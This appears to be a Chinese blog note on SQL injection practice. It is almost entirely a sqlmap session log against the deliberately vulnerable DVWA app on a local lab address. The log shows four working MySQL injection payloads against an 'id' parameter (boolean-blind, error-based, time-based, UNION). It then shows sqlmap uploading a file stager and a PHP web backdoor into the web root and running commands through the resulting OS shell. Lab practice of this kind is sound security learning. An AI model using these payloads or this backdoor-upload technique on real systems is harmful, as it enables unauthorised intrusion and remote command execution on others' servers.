sql回显注入-笔记

标签：cal   injection   schema   trying   tar   upload   aws   database   auto   

        ___

       __H__

 ___ ___[‘]_____ ___ ___  {1.1.4.16#dev}

|_ -| . [‘]     | .‘| . |

|___|_  [(]_|_|_|__,|  _|

      |_|V          |_|   http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

 

[*] starting at 09:42:39

 

[09:42:39] [INFO] resuming back-end DBMS ‘mysql‘

[09:42:39] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

    Payload: id=1‘ OR NOT 1977=1977#&Submit=Submit

 

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: id=1‘ AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit

 

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind

    Payload: id=1‘ AND SLEEP(5)-- peqj&Submit=Submit

 

    Type: UNION query

    Title: MySQL UNION query (NULL) - 2 columns

    Payload: id=1‘ UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit

---

[09:42:39] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.4.45, Apache 2.4.23

back-end DBMS: MySQL >= 5.0

[09:42:39] [INFO] going to use a web backdoor for command prompt

[09:42:39] [INFO] fingerprinting the back-end DBMS operating system

[09:42:39] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n

[09:42:43] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) (‘C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/‘) (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA

[09:42:51] [WARNING] unable to automatically parse any web server path

[09:42:51] [INFO] trying to upload the file stager on ‘C:/phpStudy/WWW/DVWA/‘ via LIMIT ‘LINES TERMINATED BY‘ method

[09:42:51] [INFO] heuristics detected web page charset ‘ascii‘

[09:42:51] [INFO] the file stager has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpummkl.php

[09:42:52] [INFO] the backdoor has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpbhbmv.php

[09:42:52] [INFO] calling OS shell. To quit type ‘x‘ or ‘q‘ and press ENTER

os-shell> dir

do you want to retrieve the command standard output? [Y/n/a] y

[09:42:56] [INFO] heuristics detected web page charset ‘GB2312‘

command standard output:

---

驱动器 C 中的卷是 BOOTCAMP

 卷的序列号是 D89B-813F

 

 C:\phpStudy\WWW\DVWA 的目录

 

2017-05-16  09:42    <DIR>          .

2017-05-16  09:42    <DIR>          ..

2015-10-05  15:51               500 .htaccess

2015-10-05  15:51             3,845 about.php

2015-10-05  15:51             7,229 CHANGELOG.md

2017-04-25  09:18    <DIR>          config

2015-10-05  15:51            33,107 COPYING.txt

2017-04-25  09:18    <DIR>          docs

2017-04-25  09:18    <DIR>          dvwa

2017-04-25  09:18    <DIR>          external

2015-10-05  15:51             1,406 favicon.ico

2017-04-25  09:18    <DIR>          hackable

2015-10-05  15:51               895 ids_log.php

2015-10-05  15:51             4,389 index.php

2015-10-05  15:51             1,869 instructions.php

2015-10-05  15:51             3,522 login.php

2015-10-05  15:51               414 logout.php

2015-10-05  15:51               148 php.ini

2015-10-05  15:51               199 phpinfo.php

2015-10-05  15:51             7,651 README.md

2015-10-05  15:51                26 robots.txt

2015-10-05  15:51             4,686 security.php

2015-10-05  15:51             2,364 setup.php

2017-05-04  20:59               466 test.php

2017-05-16  09:42               908 tmpbhbmv.php

2017-05-16  09:42               727 tmpummkl.php

2017-05-15  21:11                29 ttt.php

2017-04-25  09:18    <DIR>          vulnerabilities

              20 个文件         74,380 字节

               8 个目录 18,391,883,776 可用字节

---

os-shell> x

[09:43:02] [INFO] cleaning up the web files uploaded

[09:43:02] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

[09:43:02] [INFO] fetched data logged to text files under ‘C:\Users\zptxwd\.sqlmap\output\192.168.3.88‘

 

[*] shutting down at 09:43:03

sql回显注入-笔记

标签：cal   injection   schema   trying   tar   upload   aws   database   auto   

原文地址：http://www.cnblogs.com/enderzhou/p/6884533.html